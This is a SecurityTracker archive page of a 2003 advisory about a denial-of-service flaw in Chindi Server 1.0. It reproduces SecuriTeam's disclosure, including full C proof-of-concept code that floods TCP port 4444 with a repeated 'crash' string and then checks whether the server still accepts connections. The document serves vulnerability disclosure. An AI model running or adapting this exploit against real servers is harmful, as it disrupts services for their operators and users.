SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (File Transfer/Sharing)  >   Chindi Vendors:   Konradsson, Mikael and Lundstrom, Viktor
Chindi Server Can Be Crashed By Remote Users
SecurityTracker Alert ID:  1006429
SecurityTracker URL:  http://securitytracker.com/id/1006429
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 1 2003
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): Chindi Server version 1.0
Description:   A vulnerability was reported in the Chindi Server. A remote user can cause denial of service conditions on the server.

SecuriTeam distributed exploit code for a denial of service vulnerability in the Chindi Server. A remote user can apparently send a large number of characters (approximately 50,000) to the server on tcp port 4444 to cause the server to stop accepting any more connections.

The report credits Luca Ercoli.

Impact:   A remote user can cause the server to stop accepting connections.
Solution:   No solution was available at the time of this entry.
Vendor URL:  come.to/chindi (Links to External Site)
Cause:   Exception handling error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [EXPL] Chindi DoS Exploit Code


The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

In the US?

Contact Beyond Security at our new California office
housewarming rates on automated network vulnerability
scanning. We also welcome ISPs and other resellers!

Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
- - - - - - - - -



  Chindi DoS Exploit Code
------------------------------------------------------------------------


SUMMARY

Chindi is a server/client software package for encrypted file transfer 
written in Java.
A security vulnerability in the product allows remote attackers to cause a 
DoS attack.

DETAILS

Vulnerable systems: 
Chindi Server version 1.0

Exploit code:
/************************************************************
* Chindi server 1.0  Denial of Service
* Proof of Concept by Luca Ercoli  luca.ercoli at inwind.it
* After DoS, server appears to be up, but will not allow
* new connections.                                               *
*************************************************************/

#include 
#include 
#include 
#include 
#include 


#define PORT    4444
#define DOS     "crash"


int main(int argc, char *argv[]){


int nOpt,count,sockfd;
struct hostent *he;
struct sockaddr_in server_addr;

char *host;


printf ("\nChindi server 1.0 remote DoS\n\n");


if(argc < 2 ) {
                printf ("Usage: %s -t target\n",argv[0]);
                exit(0);
        }


while((nOpt = getopt(argc, argv, "t")) != -1) {

        switch(nOpt) {
                        case 't':
                        host = optarg;
                        break;
                        default:exit(0);
                }
        }


if ((he = gethostbyname(argv[2])) == NULL)
          {
                  herror("gethostbyname");
                  exit(1);
          }


server_addr.sin_family = AF_INET;
server_addr.sin_port = htons(PORT);
server_addr.sin_addr = *((struct in_addr *) he->h_addr);


sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);


if (connect (sockfd, (struct sockaddr *) &server_addr,sizeof(struct 
sockaddr)) == -1)
          {
                  perror("Connect");
                  exit(1);
          }


printf("1. Connected\n");
sleep(1);
printf("2. Sending crash string\n");
sleep(1);
printf("3. Verifing server status: ");
sleep(1);

for (count=0; count<9999; count++) send(sockfd,DOS,strlen(DOS),0);

close(sockfd);

if (connect (sockfd, (struct sockaddr *) &server_addr,sizeof(struct 
sockaddr)) == -1)
          {
                 printf("Crashed!.\n");
        exit(1);
          }

else { printf("Server don't crash!\n"); exit(0); }

}


ADDITIONAL INFORMATION

The information has been provided by  
<mailto:luca.ercoli@inwind.it.luca.ercoli@inwind.it> 
luca.ercoli@inwind.it.



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any kind. 
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business
 profits or special damages. 





 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC